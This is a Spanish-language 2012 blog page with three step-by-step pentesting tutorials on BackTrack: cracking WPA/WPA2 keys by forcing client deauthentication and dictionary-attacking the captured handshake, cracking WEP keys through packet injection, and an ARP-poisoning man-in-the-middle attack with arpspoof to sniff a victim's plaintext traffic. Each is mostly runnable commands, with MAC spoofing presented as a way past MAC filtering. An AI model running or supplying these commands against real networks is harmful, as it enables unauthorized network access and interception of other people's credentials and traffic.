Translate

jueves, 14 de junio de 2012

Pentesting en redes con Seguridad WPA - WPA2

No aguanté la tentación y decidí incluir ahora las pruebas en una red de tipo WPA o WPA2;

Como hicimos previamente, es recomendable ofuscar o modificar la dirección MAC de nuestra tarjeta de red; para eso escribimos en una consola:
(el simbolo # es para indicar el prompt de nuestro BackTrack 5R2)

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
# airmon-ng start wifi0




Luego miramos que redes estan en el alcance:

# airodump-ng wlan0
# airodump-ng -c (channel) -w (capture file) --bssid (AP MAC) wlan0

Desplegar BSSID (AP MAC) y las Estaciones o dispositivos que estén conectados a la red (Client MAC)

# aireplay-ng -0 1 -a (AP MAC) -c (Client MAC) wlan0


Generamos la deautenticación; para este tipo de redes debemos deautenticar a algun dispositivo que ya este autenticado, y escuchar su saludo (Handshake) en donde estará la clave encriptada; Si es exitoso detener airodump y ejecutar aircrack

aircrack-ng -w (Diccionario.lst o similar) -b (AP MAC) psk*.cap

En esta técnica es indispensable contar con un buen  diccionario, de lo contrario no vamos a tener mucho éxito.
Espero que logren muchos hallazgos!!!

SecPro 

 

 

Pentesting en redes de tipo WEP

Sigo tratando de sacar tiempo para colocar información interesante;
El dia de hoy les traigo los pasos necesarios para hacer pruebas de penetración en una red con seguridad del tipo WEP - Wireless Equivalent Privacy.
Para este efecto, usaremos la version de Linux BackTrack 5R2; 

La primera parte es para encubrir nuestra dirección MAC, o si no encubrirla, ofuscarla tratando de mimetizarla como otro tipo de dispositivo o marca de dispositivo; muchas veces los routers tienen activada la función de Filtrado de MAC; tratando de evitar que un dispositivo que no se encuentre dentro de la lista de MAC autorizadas se conecte a la red; para este efecto, es decir cambiar nuestra MAC  utilizamos la herramienta macchanger; supremamente útil para estos casos.

En una consola o terminal ejecutamos:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0


Hasta aqui hemos cambiado la MAC de la tarjeta inalámbrica; ahora procedemos a buscar las redes:

# airodump-ng wlan0

Apretamos para detener push ctrl+c

Copiamos el BSSID de la red que queramos probar

# airodump-ng -c (numero del canal) -w wep123 --bssid (bssid) wlan0

mientras pwr sea más grande, mejor
el #Data debe ser alrededor de 20.000, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20.000 y al hacerlo ejecutamos:

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Y listo; si tenenmos suficiente Data, lo mas seguro es que podamos recuperar la clave de la red.
Espero que les vaya muy bien en sus pruebas.

miércoles, 13 de junio de 2012

Ataque de Hombre En El Medio (MITM) con ArpSpoof

La mayoría de estudiantes me pregunta como se puede lograr ver el tráfico de una máquina cualquiera; para eso existen diversas técnicas, desde troyanizar la máquina, reconfigurar el proxy de la víctima, hasta generar un ataque de Hombre en  el Medio.
Este ataque es de los más utiles debido a que no se requiere hacer absolutamente nada en la maquina que deseamos escuchar el tráfico;
Debemos tener en cuenta que en las redes interconectadas por switch solo el tráfico broadcast es el que llega a todas las máquinas, asi que si activamos un sniffer sin realizar un ataque de Hombre en el medio, vamos a ver únicamente este tipo de trafico, es decir consultas y respuestas ARP.

Para realizar esta prueba de concepto necesitamos:
  • Una Máquina corriendo Linux; preferiblemente BackTrack (Yo utilizo la version 5 R2)
  • Una Máquina que haga las veces de Víctima del Ataque
  • Las dos máquinas deben estar en la misma red y utilizar la misma puerta de enlace o gateway.

El Linux BackTrack (Una de mis Herramientas Favoritas) ya incorpora todas las aplicaciones que utilizaremos para este efecto; lo mas importante es que tengamos la suit dsniff; si usamos un Linux que no la tenga instalada, entonces simplemente podemos escribir:

root@linux:~# apt-get install dsniff

Una vez instalada la suite dsniff podemos comenzar.

Lo primero que debemos conocer es la dirección ip de la máquina víctima y su puerta de enlace;
con esta información

Como debemos estar en una Red Local, será muy facil el encontrar la IP de la maquina víctima, para eso tenemos herramientas excelentes como Nmap, Hping3, Genlist; si alguien necesita mas información sobre ellas, por favor escribame un mensaje y trataré de postear información util sobre ellas, y probablemente algunos links a libros indispensables.

Conociendo la IP de la victima, vamos a iniciar el envenenamiento de ARP (ARP Poisoning); para esto, lo primero que debemos hacer es activar el reenvío de paquetes en nuestro linux, de lo contrario cuando activemos el envenenamiento, los paquetes se quedarian en el BackTrack y no seguirian su destino hacia o desde la internet, lo cual resultaria mas bien en una Denegación de Servicio, tema apasionante que espero tratar en otra oportunidad.

Una imagen del envenenamiento seria:
                             




En donde el trafico que va desde y hacia Bob y Alice no viaja directo entre ellos sino que pasa por la maquina Attacker, de esta forma podemos hacer sniffing y ver todo su trafico.

Como decíamos debemos activar el Forwarding o reenvío de paquetes asi:


root@linux:~# echo 1 > /proc/sys/net/ipv4/ip_forward

El colocar en 1 el valor del archivo ip_forward indica al S.O. que active el reenvio, que por defecto viene desactivado.

Bien; ahora en la misma pantalla de Terminal, debemos escribir:

root@linux:~#arpspoof -i (Tu Tarjeta de red, eth correspondiente) -t (ip de la víctima ej. 10.0.0.7) (ip de la puerta de enlace ej 10.0.0.1).

Abrimos otra Terminal y escribimos:

root@linux:~#arpspoof -i (Interfase de red eth correspondiente) -t (Ip de la Puerta de Enlace ej. 10.0.0.1) (ip de la victima ej 10.0.0.7)

Activamos nuestro Wireshark en el BackTrack, lo ponemos a escuchar en la misma interfase que estamos utilizando para el envenenamiento; asi veremos todo el tráfico desde y hacia la víctima; todos los protocolos en texto plano como http, telnet, pop, smtp, ftp podran ser vistos sin problema;
Para el trafico encriptado, es decir htttps, podemos utilizar otra técnica que mas adelante en otro post explicaré.



Les deseo un Happy Ethical Hacking!!.